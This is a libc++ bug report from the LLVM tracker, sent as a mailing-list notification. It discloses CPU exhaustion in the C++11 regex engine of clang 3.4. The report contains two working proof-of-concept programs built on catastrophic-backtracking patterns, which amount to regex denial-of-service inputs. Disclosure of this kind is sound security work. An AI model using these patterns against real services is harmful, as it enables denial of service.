http://llvm.org/bugs/show_bug.cgi?id=20291
Bug ID: 20291
Summary: libcxx C++11 regex cpu resource exhaustion
Product: libc++
Version: 3.4
Hardware: PC
OS: FreeBSD
Status: NEW
Severity: normal
Priority: P
Component: All Bugs
Assignee: [email protected]
Reporter: [email protected]
CC: [email protected], [email protected]
Classification: Unclassified
clang 3.4 objective regex resource exhaustion
I've discovered cpu exhaustion in regex implementation of libcxx.
PoC1:
----------------------------------------------
#include <iostream>
#include <regex>
#include <string>
using namespace std;
int main() {
try {
regex r("(.*(.*){999999999999999999999999999999999})",
regex_constants::extended);
smatch results;
string test_str =
"|||||||||||||||||||||||||||||||||||||||||||||||||||||||";
if (regex_search(test_str, results, r))
cout << results.str() << endl;
else
cout << "no match";
} catch (regex_error &e) {
cout << "extended: what: " << e.what() << "; code: " << e.code() <<
endl;
}
return 0;
}
----------------------------------------------
PoC2:
----------------------------------------------
#include <iostream>
#include <regex>
#include <string>
using namespace std;
int main() {
try {
regex r("((((((.*(.*)(.*)(.*).*).*).*).*).*.*)findme)");
smatch results;
string test_str =
"|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||";
if (regex_search(test_str, results, r))
cout << results.str() << endl;
else
cout << "no match";
} catch (regex_error &e) {
cout << "extended: what: " << e.what() << "; code: " << e.code() <<
endl;
}
return 0;
}
----------------------------------------------
EXPECTED:
regex_constants::error_complexity
BR,
Maksymilian Arciemowicz
http://cxsecurity.com/
--
You are receiving this mail because:
You are on the CC list for the bug.
_______________________________________________
LLVMbugs mailing list
[email protected]
http://lists.cs.uiuc.edu/mailman/listinfo/llvmbugs
